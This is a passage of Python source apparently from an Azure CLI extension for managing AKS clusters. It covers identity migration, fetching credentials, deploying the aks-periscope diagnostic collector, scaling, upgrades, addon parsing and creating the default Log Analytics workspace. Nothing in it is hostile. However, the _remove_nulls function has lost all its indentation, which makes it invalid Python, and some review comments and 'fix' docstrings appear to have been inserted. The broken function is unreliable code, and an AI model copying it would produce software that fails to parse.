            goal_identity_type = "userassigned"

    if current_identity_type != goal_identity_type:
        # Migrating identity types is disruptive; require confirmation unless --yes.
        from knack.prompting import prompt_y_n
        msg = ""
        if current_identity_type == "spn":
            msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
                   'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
                   'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
                   'Are you sure you want to perform this operation?').format(goal_identity_type)
        else:
            msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
                   'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        if goal_identity_type == "systemassigned":
            instance.identity = ManagedClusterIdentity(
                type="SystemAssigned"
            )
        elif goal_identity_type == "userassigned":
            user_assigned_identity = {
                assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
            }
            instance.identity = ManagedClusterIdentity(
                type="UserAssigned",
                user_assigned_identities=user_assigned_identity
            )

    if enable_pod_identity:
        _update_addon_pod_identity(instance, enable=True)

    if disable_pod_identity:
        _update_addon_pod_identity(instance, enable=False)

    if tags:
        instance.tags = tags

    headers = get_aks_custom_headers(aks_custom_headers)

    # NOTE(review): assumes instance.addon_profiles is not None here — TODO confirm
    # the service always returns a dict for existing clusters.
    monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
        instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
        instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
        instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux'].enabled

    return _put_managed_cluster_ensuring_permission(cmd,
                                                    client,
                                                    subscription_id,
                                                    resource_group_name,
                                                    name,
                                                    instance,
                                                    monitoring_addon_enabled,
                                                    ingress_appgw_addon_enabled,
                                                    virtual_node_addon_enabled,
                                                    False,
                                                    instance.agent_pool_profiles[0].vnet_subnet_id,
                                                    _is_msi_cluster(instance),
                                                    attach_acr,
                                                    headers,
                                                    no_wait)
def aks_show(cmd, client, resource_group_name, name):   # pylint: disable=unused-argument
    """Fetch a managed cluster and return it with noisy null fields removed."""
    managed_cluster = client.get(resource_group_name, name)
    scrubbed = _remove_nulls([managed_cluster])
    return scrubbed[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd,    # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        name,
                        admin=False,
                        user='clusterUser',
                        path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
                        overwrite_existing=False,
                        context_name=None):
    """Fetch kubeconfig credentials for the cluster and print or merge them into *path*."""
    # Pick the credential endpoint: admin wins over the user role selection.
    if admin:
        credential_results = client.list_cluster_admin_credentials(resource_group_name, name)
    elif user.lower() == 'clusteruser':
        credential_results = client.list_cluster_user_credentials(resource_group_name, name)
    elif user.lower() == 'clustermonitoringuser':
        credential_results = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
    else:
        raise CLIError("The user is invalid.")

    if not credential_results:
        raise CLIError("No Kubernetes credentials found.")

    try:
        kubeconfig = credential_results.kubeconfigs[0].value.decode(encoding='UTF-8')
        _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd,    # pylint: disable=too-many-statements,too-many-locals
                client,
                resource_group_name,
                name,
                storage_account=None,
                sas_token=None,
                container_logs=None,
                kube_objects=None,
                node_logs=None):
    """Deploy the aks-periscope daemon set to the cluster to collect logs and
    diagnostic information into a storage account.

    If no storage account is given, one is looked up from the cluster's
    diagnostic settings; if no SAS token is given, read/write and read-only
    tokens are generated from the account keys. Fix in this revision: the
    user-facing "Azure Stroage Explorer" typo is corrected to "Storage".
    """
    colorama.init()

    mc = client.get(resource_group_name, name)

    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')

    storage_account_id = None
    if storage_account is None:
        print("No storage account specified. Try getting storage account from diagnostic settings")
        storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
        if storage_account_id is None:
            raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")

    from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
    if storage_account_id is None:
        # A bare account name was passed; expand it to a full resource id in
        # the cluster's resource group and subscription.
        if not is_valid_resource_id(storage_account):
            storage_account_id = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Storage', type='storageAccounts',
                name=storage_account
            )
        else:
            storage_account_id = storage_account

    if is_valid_resource_id(storage_account_id):
        try:
            parsed_storage_account = parse_resource_id(storage_account_id)
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        raise CLIError("Invalid storage account id %s" % storage_account_id)

    storage_account_name = parsed_storage_account['name']

    readonly_sas_token = None
    if sas_token is None:
        # No token supplied: derive one from the account keys. A second,
        # read-only token is produced for the URL shown to the user.
        storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
        storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
                                                                         storage_account_name)
        kwargs = {
            'account_name': storage_account_name,
            'account_key': storage_account_keys.keys[0].value
        }
        cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)

        sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rwdlacup',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))

        readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rl',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))

        readonly_sas_token = readonly_sas_token.strip('?')

    from knack.prompting import prompt_y_n
    print()
    print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
          f'save them to the storage account '
          f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
          f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
    print()
    print('If you share access to that storage account to Azure support, you consent to the terms outlined'
          f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
    print()
    if not prompt_y_n('Do you confirm?', default="n"):
        return

    print()
    print("Getting credentials for cluster %s " % name)
    _, temp_kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)

    print()
    print("Starts collecting diag info for cluster %s " % name)

    # Fill the account name and SAS key placeholders in the published
    # aks-periscope deployment manifest (both are base64 in the YAML).
    sas_token = sas_token.strip('?')
    deployment_yaml = urlopen(
        "https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
    deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
                                              (base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
    deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
                                              (base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))

    # Optionally append user-supplied filters to the diagnostic config lines.
    yaml_lines = deployment_yaml.splitlines()
    for index, line in enumerate(yaml_lines):
        if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
            yaml_lines[index] = line + ' ' + container_logs
        if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
            yaml_lines[index] = line + ' ' + kube_objects
        if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
            yaml_lines[index] = line + ' ' + node_logs
    deployment_yaml = '\n'.join(yaml_lines)

    fd, temp_yaml_path = tempfile.mkstemp()
    temp_yaml_file = os.fdopen(fd, 'w+t')
    try:
        temp_yaml_file.write(deployment_yaml)
        temp_yaml_file.flush()
        temp_yaml_file.close()
        try:
            print()
            print("Cleaning up aks-periscope resources if existing")

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "serviceaccount,configmap,daemonset,secret",
                             "--all", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding-view", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRole",
                             "aks-periscope-role", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "--all",
                             "apd", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.DEVNULL)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "CustomResourceDefinition",
                             "diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            print()
            print("Deploying aks-periscope")

            subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
                                     temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            raise CLIError(err.output)
    finally:
        os.remove(temp_yaml_path)

    print()

    fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
    normalized_fqdn = fqdn.replace('.', '-')
    token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
    log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
                              f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"

    print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')

    print()
    # Fixed typo: "Stroage" -> "Storage".
    print(f'You can download Azure Storage Explorer here '
          f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
          f' to check the logs by adding the storage account using the following URL:')
    print(f'{format_hyperlink(log_storage_account_url)}')

    print()
    if not prompt_y_n('Do you want to see analysis results now?', default="n"):
        print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
              f"anytime to check the analysis results.")
    else:
        display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
    """Display the diagnostic analysis results collected by aks-periscope."""
    colorama.init()

    # Validates that the cluster exists (raises otherwise); the returned
    # object itself is not needed here.
    client.get(resource_group_name, name)

    kubeconfig_path = tempfile.mkstemp()[1]
    aks_get_credentials(cmd, client, resource_group_name, name,
                        admin=True, path=kubeconfig_path)

    display_diagnostics_report(kubeconfig_path)
def aks_scale(cmd,  # pylint: disable=unused-argument
              client,
              resource_group_name,
              name,
              node_count,
              nodepool_name="",
              no_wait=False):
    """Set the node count of a (non-autoscaled) node pool in the cluster."""
    instance = client.get(resource_group_name, name)
    pool_count = len(instance.agent_pool_profiles)

    # An explicit pool name is mandatory when the cluster has several pools.
    if pool_count > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')

    for agent_profile in instance.agent_pool_profiles:
        matches = agent_profile.name == nodepool_name or (nodepool_name == "" and pool_count == 1)
        if not matches:
            continue
        if agent_profile.enable_auto_scaling:
            raise CLIError("Cannot scale cluster autoscaler enabled node pool.")

        agent_profile.count = int(node_count)  # pylint: disable=no-member
        # null out the SP and AAD profile because otherwise validation complains
        instance.service_principal_profile = None
        instance.aad_profile = None
        return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)

    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd,    # pylint: disable=unused-argument, too-many-return-statements
                client,
                resource_group_name,
                name,
                kubernetes_version='',
                control_plane_only=False,
                no_wait=False,
                node_image_only=False,
                yes=False):
    """Upgrade the cluster's Kubernetes version, or just the node image of
    every node pool when --node-image-only is passed.

    Prompts for confirmation at each disruptive step unless --yes is given.
    """
    from knack.prompting import prompt_y_n
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None

    instance = client.get(resource_group_name, name)

    # Detect legacy AvailabilitySet-backed pools: they cannot take
    # node-image-only upgrades and force the "upgrade everything" path below.
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break

    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        msg = "This node image upgrade operation will run across every node pool in the cluster" \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None

        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            agent_pool_client = cf_agent_pools(cmd.cli_ctx)
            # NOTE(review): no_wait is hard-coded to True here — presumably to
            # fire off all per-pool upgrades without blocking on each one;
            # the caller's --no-wait flag is not honored on this path.
            _upgrade_single_nodepool_image_version(True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]

    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)

    upgrade_all = False
    instance.kubernetes_version = kubernetes_version

    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None

    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Kick off a node-image-only upgrade for a single node pool, optionally without waiting."""
    upgrade_op = client.upgrade_node_image_version
    return sdk_no_wait(no_wait, upgrade_op, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd,    # pylint: disable=too-many-statements
                        addons_str,
                        subscription_id,
                        resource_group_name,
                        addon_profiles=None,
                        workspace_resource_id=None,
                        appgw_name=None,
                        appgw_subnet_prefix=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False,
                        aci_subnet_name=None,
                        vnet_subnet_id=None):
    """Translate the comma-separated --enable-addons string into a dict of
    ManagedClusterAddonProfile objects, keyed by addon profile name.

    Each recognized addon is popped from the list with list.remove(); anything
    left over at the end is reported as unrecognized. (Note: a duplicated addon
    name in addons_str therefore also ends up in the "not recognized" error.)
    """
    if not addon_profiles:
        addon_profiles = {}
    addons = addons_str.split(',') if addons_str else []
    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('http_application_routing')
    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('kube-dashboard')
    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)

        # Normalize to a leading-slash, no-trailing-slash resource id.
        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('azure-policy')
    if 'gitops' in addons:
        addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('gitops')
    if 'ingress-appgw' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        # Both the (deprecated) subnet prefix and the subnet CIDR map to the
        # same config key; when both are given, appgw_subnet_cidr wins.
        if appgw_subnet_prefix is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')
    if 'open-service-mesh' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
        addons.remove('open-service-mesh')
    if 'confcom' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return the resource id of the default Log Analytics workspace for the
    monitoring addon, creating the default resource group/workspace if needed.

    The workspace region is derived from the resource group's location using
    per-cloud mapping tables. Fix in this revision: an unsupported cloud now
    raises CLIError instead of only logging and then crashing with a NameError
    on the undefined region variables.
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2",
        "brazilsouth": "CQ",
        "brazilsoutheast": "BRSE",
        "norwayeast": "NOE",
        "southafricanorth": "JNB",
        "northcentralus": "NCUS",
        "uaenorth": "DXB",
        "germanywestcentral": "DEWC",
        "ukwest": "WUK",
        "switzerlandnorth": "CHN",
        "switzerlandwest": "CHW",
        "uaecentral": "AUH"
    }
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "brazilsouth",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "northcentralus",
        "northeurope": "northeurope",
        "southafricanorth": "southafricanorth",
        "southafricawest": "southafricanorth",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "ukwest",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2",
        "norwayeast": "norwayeast",
        "norwaywest": "norwayeast",
        "switzerlandnorth": "switzerlandnorth",
        "switzerlandwest": "switzerlandwest",
        "uaenorth": "uaenorth",
        "germanywestcentral": "germanywestcentral",
        "germanynorth": "germanywestcentral",
        "uaecentral": "uaecentral",
        "eastus2euap": "eastus2euap",
        "brazilsoutheast": "brazilsoutheast"
    }
    # mapping for azure china cloud
    # log analytics only support China East2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }
    # mapping for azure us governmner cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV",
        "usgovarizona": "PHX"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia",
        "usgovtexas": "usgovvirginia",
        "usgovarizona": "usgovarizona"
    }

    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name

    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
    else:
        # Bug fix: previously this only logged the error and fell through, so
        # the code below crashed with a NameError on workspace_region_code.
        # Fail fast with a clear, catchable error instead.
        logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
        raise CLIError('AKS Monitoring addon not supported in cloud : {}'.format(cloud_name))

    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)

    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)

    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        try:
            resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except CloudError as ex:
            # 404 means the workspace itself doesn't exist yet; fall through to create it.
            if ex.status_code != 404:
                raise ex
    else:
        resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})

    default_workspace_params = {
        'location': workspace_region,
        'properties': {
            'sku': {
                'name': 'standalone'
            }
        }
    }
    async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                    default_workspace_params)

    # Poll (15s at a time) until the workspace creation completes.
    ws_resource_id = ''
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break

    return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
    """Install the ContainerInsights solution into the Log Analytics workspace
    referenced by the monitoring addon, via an inline ARM deployment.

    :param cmd: CLI command context (provides ``cli_ctx`` for clients).
    :param addon: monitoring addon profile; must carry the workspace resource
        ID in its config under CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.
    :return: the deployment result, or None when the addon is disabled.
    :raises CLIError: when the workspace resource ID cannot be parsed.
    """
    if not addon.enabled:
        return None
    # workaround for this addon key which has been seen lowercased in the wild
    for key in list(addon.config):
        if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
            addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)
    # normalize the ID to exactly one leading '/' and no trailing '/'
    workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError('Could not locate resource group in workspace-resource-id URL.')
    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        raise ex
    # millisecond timestamp used to make the deployment names unique
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
    solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
    # pylint: disable=line-too-long
    # Nested-deployment ARM template: deploys a
    # Microsoft.OperationsManagement/solutions "ContainerInsights(<workspace>)"
    # resource into the workspace's own subscription/resource group (split out
    # of the workspace resource ID inside the template).
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
